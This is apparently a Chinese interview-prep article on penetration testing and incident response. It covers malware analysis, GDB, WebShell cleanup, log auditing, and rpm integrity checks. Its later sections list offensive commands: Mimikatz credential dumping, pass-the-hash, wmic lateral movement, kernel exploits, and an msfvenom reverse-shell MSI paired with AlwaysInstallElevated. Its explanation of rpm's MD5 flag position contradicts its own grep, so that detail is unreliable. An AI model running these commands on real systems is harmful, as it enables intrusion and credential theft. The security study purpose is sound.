2025年渗透测试面试题总结-72(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
1. 样本分析思路(恶意软件逆向)
2. Linux GDB分析样本实战
3. 高级应急案例:WebShell后门集群
4. 日志审计重点
5. 命令被替换的检测方法
6. RPM校验参数
7. APT研究深度
8. 漏洞分析方法论
9. 内网漫游核心路径
10. 横向移动原理
11. 权限提升速查表
1、如何做的样本分析,思路是什么 2、如何用linuxgdb分析一个简单样本 3、再举一个你的其他应急的例子(我举的是挖矿病毒) 4、日志你看的是什么日志,web服务器日志嘛 5、某些命令被替换了,如何发现 6、rpm有个参数就可以校验命令是否被替换,是什么 7、是否做过APT相关的研究 8、如何分析windows,linux,web一些常见的漏洞 9、内网突破到内网漫游的思路 10、如何横向、IPC了解过嘛,横向原理 11、权限提升(windows,linux)1. 样本分析思路(恶意软件逆向)
四步分析法:
基础静态分析
- 文件哈希(SHA256/MD5)匹配威胁情报平台(VirusTotal)
- 字符串提取:
strings -n 8 malware.bin | grep -E 'http|/bin/bash|Registry'- 节区头检查:
readelf -S(Linux) / PEiD查壳 (Windows)动态行为分析
bash# Linux沙箱监控 strace -f -s 2048 ./malware # 系统调用跟踪 ltrace -f ./malware # 库函数调用代码逆向
- Windows:IDA Pro分析API调用链(重点监控
CreateRemoteThread、RegSetValue)- Linux:GDB调试定位Shellcode(见问题2详解)
网络行为解耦
- 使用FakeNet-NG模拟网络服务捕获C2通信
- 解密算法分析:如硬编码密钥(
XOR 0x41)、DNS隧道编码
2. Linux GDB分析样本实战
分析篡改
ps命令的rootkit:bash# 1. 附加进程 gdb -p $(pidof malware) # 2. 关键断点设置 (gdb) b *main # 主函数入口 (gdb) b *open@plt # 监控文件操作 (gdb) b *connect # 拦截网络连接 # 3. 反汇编验证恶意行为 (gdb) disas /r malware_function (gdb) x/20i $rip # 检查当前指令 # 4. 寄存器与内存取证 (gdb) info registers # 查看寄存器值 (gdb) x/8wx 0x7fffffffdc50 # 检查栈内存 (gdb) x/s 0x555555556010 # 解析数据段字符串 # 5. 绕过反调试 (gdb) set follow-fork-mode child # 跟踪子进程 (gdb) handle SIGTRAP nopass # 忽略调试陷阱信号
3. 高级应急案例:WebShell后门集群
场景:某企业服务器被批量植入隐形WebShell
处置流程:
- 快速遏制
- 防火墙阻断异常IP:
iptables -A INPUT -s 192.168.5.0/24 -j DROP- 主机取证
- 查找变种WebShell:
grep -r --include=*.php 'eval($_POST' /var/www- 排查定时任务:
crontab -l与/var/spool/cron/- 日志关联
bash# 定位攻击源IP awk '$4 ~ /[15\/Sep\/2025/ && $6 ~ /POST.*\.php/ {print $1}' /var/log/apache/access.log | sort -u- 溯源分析
- Webshell通信特征:HTTP请求体含
base64_decode(zlib.inflate(...))- 关联威胁情报:匹配到APT组织“海莲花”的TTPs
4. 日志审计重点
必查四类日志:
日志类型 分析命令/工具 关键指标 Web访问日志 goaccess -f access.logHTTP 400/500错误、异常User-Agent 系统认证日志 ausearch -m USER_LOGIN非办公时间登录、sudo提权记录 进程审计日志 auditd规则监控execve未知二进制执行路径 网络连接日志 journalctl -u nf_conntrack隐蔽端口通信(如DNS over TCP)
5. 命令被替换的检测方法
三重验证技巧:
- 哈希校验
bash# 获取合法命令哈希 rpm -Vf /bin/ps # 重点检查输出中的"5"标记(MD5变化)- 时间线分析
bashstat /bin/netstat # 检查修改时间是否异常 find /usr/bin -mtime -1 # 查找24小时内修改的文件- 内存校验
- 使用
busybox静态编译版对比运行结果:
/tmp/busybox psvs 系统ps
6. RPM校验参数
关键命令:
bashrpm -Va | grep '^..5' # 过滤MD5变化的文件输出解析:
S.5....T. c /usr/bin/top
- 第2个字符".":无所有者变化
- 第5个字符"5":MD5校验失败 → 文件被篡改
7. APT研究深度
实战研究框架:
- TTPs映射
- 提取APT29的钓鱼文档宏代码(TA0001初始访问)
- C2基础设施分析
- 解析Cobalt Strike配置文件(端口跳跃、证书伪造)
- 漏洞武器化跟踪
- 关联ProxyLogon(CVE-2021-26855)与APT40攻击活动
- 防御绕过技术
- 分析无文件攻击:WMI事件订阅持久化(T1546.003)
8. 漏洞分析方法论
差异化分析框架:
系统类型 分析重点 工具链 Windows COM对象滥用、ACL配置错误 ProcMon、AccessChk Linux SUID提权、内核模块漏洞 LinPEAS、checksec.sh Web 反序列化链、SSTI上下文逃逸 ysoserial、tplmap 案例:
分析WebLogic CVE-2020-2883:java// 漏洞触发点:T3协议的反序列化器 weblogic.rjvm.InboundMsgAbbrev.readObject() → 调用resolveClass()未校验
9. 内网漫游核心路径
五步突破法:
mermaidgraph LR A[初始立足点] --> B{信息收集} B --> C[凭证窃取] C --> D[横向移动] D --> E[权限提升] E --> F[域控控制]关键技术:
- 信息收集
- BloodHound扫描AD拓扑:
SharpHound.exe -c All- 凭证窃取
- Mimikatz提取LSASS内存:
sekurlsa::logonpasswords- 横向移动
powershell# IPC$利用示例 net use \\DC01\IPC$ /user:domain\user Password123! wmic /node:DC01 process call create "cmd.exe /c whoami"- 权限提升
- Windows:MS14-068伪造Kerberos票据(goldenPac.py )
- Linux:Dirty Pipe(CVE-2022-0847)覆盖/etc/passwd
10. 横向移动原理
IPC$ 工作机制:
mermaidsequenceDiagram 攻击者->>目标机: 建立IPC$空会话 (net use \\target\IPC$ "") 目标机-->>攻击者: 返回访问令牌 攻击者->>目标机: WMI/SMB命令执行 (wmic /node:target process call create)防御绕过技巧:
- 哈希传递(Pass-the-Hash):
psexec.py -hashes :NTLM_HASH user@target- 票据传递(Pass-the-Ticket):
注入Rubeus获取的TGT票据
11. 权限提升速查表
系统 漏洞类型 利用工具 Windows 服务路径权限缺陷 accesschk.exe /accepteula Token滥用 potato家族(JuicyPotato) Linux SUID滥用 find / -perm -4000 2>/dev/null 内核漏洞 dirtycow.c(CVE-2016-5195) Cron Job劫持 覆盖/etc/cron.d/任务文件 Windows提权案例:
利用AlwaysInstallElevated策略:cmdreg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f msi > evil.msi msiexec /quiet /qn /i C:\evil.msi